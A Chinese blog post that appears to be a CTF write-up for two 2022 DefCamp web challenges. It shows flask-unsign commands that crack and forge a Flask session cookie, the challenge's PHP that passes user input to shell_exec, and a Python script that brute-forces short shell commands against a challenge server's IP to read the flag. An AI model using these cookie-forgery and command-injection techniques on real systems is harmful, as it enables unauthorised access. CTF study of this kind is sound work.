Posted Updated a minute read (About 178 words)

2022DefCamp CTF

web_intro

爆破flask_session的cookie

flask-unsign --unsign --cookie "eyJsb2dnZWRfaW4iOmZhbHNlfQ.YgYrAQ.--h0ihPw9_7i2FNqzJ-u-Oythjk"

img

爆破出密码以后,在加密

flask-unsign --sign --cookie "{'logged': True}" --secret 'password'

para-code

if (strlen($_GET['start']) < 5){
  echo shell_exec($_GET['start']);
} else {
  echo "Please enter a valid command";
}

四字符getshell

队里大师傅的解,收藏起来了

m4 *

后来师傅在群里说思路,确实有被震惊到,原来他是直接循环爆破两个字符,有回显的就可以了。。

import requests
import string
s=requests.session()
url="http://34.159.7.96:32210/"
a="0123456789abcdefghijklmnopqrstuvwxyz"
for i in a:
    for j in a:
        payload=f"?start={i}{j} *"
        r=s.get(url+payload).text
        if "$flag = " in r:
            print(payload)
            print(r)

确实是一个挺好的思路

2022DefCamp CTF

http://example.com/2022/02/11/2022DefCamp-CTF/

Author

vague huang

Posted on

2022-02-11

Updated on

2022-02-16

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×